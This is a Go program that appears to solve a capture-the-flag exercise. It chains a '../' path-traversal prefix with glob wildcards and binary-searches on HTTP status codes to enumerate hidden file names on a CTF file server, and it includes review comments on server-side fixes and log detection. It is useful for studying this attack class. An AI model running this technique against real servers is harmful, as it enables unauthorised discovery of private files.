@Acebond
Created May 19, 2021 12:08
glob_search
package main
import (
"fmt"
"log"
"net/http"
"os"
"strings"
// "net/url"
)
// Settings for a CTF exercise against a file-serving HTTP endpoint.
//
// The request template pairs a "../" traversal prefix with shell-style
// wildcard patterns, and the program reads the HTTP status of each response as
// a yes/no answer about which names exist under searchFolder.
var (
	// target is the host:port of the CTF service.
	target = "ctf.shellz.club:8081"

	// path is the endpoint that takes a file name in its "name" parameter.
	path = "/file"

	// query is the query-string template; the literal INJECTION marker is
	// replaced with searchFolder plus a pattern by formatURL.
	// (The author also left "/var/apache2/cgi-bin/" here as a commented-out note.)
	query = "name=../../.././../../../../../../INJECTION"

	// searchFolder is the directory prefix placed in front of every pattern.
	searchFolder = "/home/ctf/secret/"

	// searchSpace is the alphabet of candidate characters. It is spliced into
	// the URL as-is, so "%20" is presumably meant to reach the server as a
	// space after URL decoding.
	searchSpace = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_"

	// maxFileLength is the exclusive upper bound on the name lengths tried
	// by findFiles.
	maxFileLength = 30

	// A body-content check (errorResponse = "That log file doesn't exist") was
	// left disabled by the author; the status code is used instead.
)
// formatURL builds the request URL for one pattern.
//
// It joins the package-level target, path and query into a template and
// replaces the first INJECTION marker with searchFolder followed by injection.
// The pattern is inserted verbatim; no URL escaping is applied.
func formatURL(injection string) string {
	template := "http://" + target + path + "?" + query
	return strings.Replace(template, "INJECTION", searchFolder+injection, 1)
}
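// isValidFile reports whether the server answers 200 OK for the given pattern
// placed under searchFolder.
//
// Only the status code is inspected; the response body is never read. A
// transport error aborts the program via log.Panicln.
//
// NOTE(review): the status code is informative only because the server
// apparently responds differently to a pattern that matches than to one that
// does not. On the server side, canonicalising the requested name, confining
// it to one base directory, and never passing request input through wildcard
// expansion would remove that signal. Requests carrying "../", "[" or "?" in
// the name parameter are also easy to spot in access logs.
func isValidFile(filename string) bool {
	resp, err := http.Get(formatURL(filename))
	if err != nil {
		log.Panicln(err.Error())
	}
	// The original left the body open on every call, which leaks a connection
	// and file descriptor per request.
	defer resp.Body.Close()

	return resp.StatusCode == http.StatusOK
}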
// binarySearchLetters collects every character of searchSpace that can follow
// currentFilename in a name of exactly length characters, appending each one
// to *results.
//
// The candidate set is halved on each call. Each half is sent as a bracket
// class after the known prefix, padded with one "?" per remaining position,
// and a half is explored further only when isValidFile accepts that pattern.
// Both halves are always probed, so more than one character can be reported
// for the same prefix.
func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) {
	// One candidate left: record it without issuing another request.
	if len(searchSpace) == 1 {
		*results = append(*results, searchSpace)
		return
	}

	mid := len(searchSpace) / 2
	// One wildcard for every position after the character being resolved.
	padding := strings.Repeat("?", length-len(currentFilename)-1)

	for _, half := range [2]string{searchSpace[:mid], searchSpace[mid:]} {
		probe := fmt.Sprintf("%s[%s]%s", currentFilename, half, padding)
		if isValidFile(probe) {
			binarySearchLetters(currentFilename, half, length, results)
		}
	}
}
// findValidFiles returns every name of exactly length characters that the
// server accepts, built one position at a time.
//
// It starts from the empty prefix. On each pass, every known prefix is
// extended by each character binarySearchLetters reports for it, and the
// extended set replaces the previous one. The current prefix set is logged at
// the start of every pass.
func findValidFiles(length int) []string {
	log.Printf("Finding filenames with length: %d\n", length)

	fileNames := []string{""}
	for pos := 0; pos < length; pos++ {
		log.Println(fileNames)

		// Prefixes one character longer than those in fileNames.
		var extended []string
		for _, prefix := range fileNames {
			var nextChars []string
			binarySearchLetters(prefix, searchSpace, length, &nextChars)
			for _, c := range nextChars {
				extended = append(extended, prefix+c)
			}
		}
		fileNames = extended
	}
	return fileNames
}
// findFiles tries each name length from 10 up to, but not including,
// maxFileLength. A length is checked first with a pattern made only of "?"
// wildcards; when the server accepts it, the names of that length are resolved
// with findValidFiles and logged.
func findFiles() {
	for n := 10; n < maxFileLength; n++ {
		// Skip lengths for which no name matches at all.
		if !isValidFile(strings.Repeat("?", n)) {
			continue
		}
		for _, name := range findValidFiles(n) {
			log.Printf("Found File: %s\n", name)
		}
	}
}
// main sets HTTP_PROXY to a listener on 127.0.0.1:8080 and then runs the
// search. net/http's default transport takes its proxy from the environment,
// so the requests go through that address (presumably a local intercepting
// proxy used to watch the traffic).
//
// A -path flag for overriding searchFolder was left commented out by the
// author:
//
//	flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search")
//	flag.Parse()
func main() {
	const localProxy = "http://127.0.0.1:8080"

	os.Setenv("HTTP_PROXY", localProxy)
	findFiles()
}